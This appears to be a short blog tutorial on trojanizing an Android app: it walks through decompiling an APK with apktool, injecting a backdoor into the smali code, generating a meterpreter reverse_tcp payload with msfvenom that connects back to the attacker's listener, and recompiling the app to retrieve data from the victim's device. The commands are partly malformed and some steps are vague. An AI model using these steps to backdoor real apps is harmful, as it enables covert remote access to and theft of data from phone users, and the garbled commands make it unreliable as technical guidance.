How to Decompile an apk file and set a payload ...... ?

Retrieve data using an Android App 📲📲👻👻

In this blog i'm going to explain how to decompile an android app using msfconsole and msfvenom. To complete this task you should have a basic knowledge on kali. I'm going to use msfvenom to set payloads and set up listener to metasploitable framework. And you need a little bit of knowledge on reverse engineering in order to complete the following task.
The tools mentioned below is use to complete the following task.

  • VMware or Virtual Box
  • Kali Linux
  • Android Emulator
First you have to download the .apk file which is the android app we are going to decompile. 
Then open a kali terminal and lets see how we are going to decompile it using apk tools. 
Open the terminal and type 

# apktool -h

hich displays the possible things you can do with your apk tools.
As you can see in the terminal to decompile your app type

# apktool d -o folder app.apk

In here from -o it save the output decompiled file into the folder called folder.
Then it will decompile your app to smali files. For many android apps it is very easy to decompile the app.

Furthermore you can decompile your .apk file to a jar file using dex2jar.

After you decompile the apk to smali, you can edit or add any backdoor or any thing in to the smali file. But if any error occurred after you changed the smali, it may not recompile to the .apk again. So make sure you inject them to the proper place in proper way.

After injecting, we have to set the payload. For that first check your ip using command #ifconfig  and find a port which is not using. In here i choose 444.

 #msfvenom -p android/meterpreter/reverse_tcp  set LHOST=  192.168.##.##  LPORT=###  -o <output-file-name>

Then your payload will save to the output folder.
Go to the folder where your payload is stored, and copy the folder metasploit and paste it in the original file inside the its com file.And now try to recompile your folder using the command inside the folder which contained the decompiled smali files.

#apktool b

 After completing the above basic steps try retrieve information through your android app, using the backdoor.

This blog will only give you a basic idea about how to decompile an android app and how to set a payload.

No comments:

Post a Comment

Subscribe to: Comments (Atom)

Hack The Box : How to get Invite code.

What is Hack the Box ? Hack the box is an online platform to test and improve your skills in Penetration testing in Cyber Security. Hack ...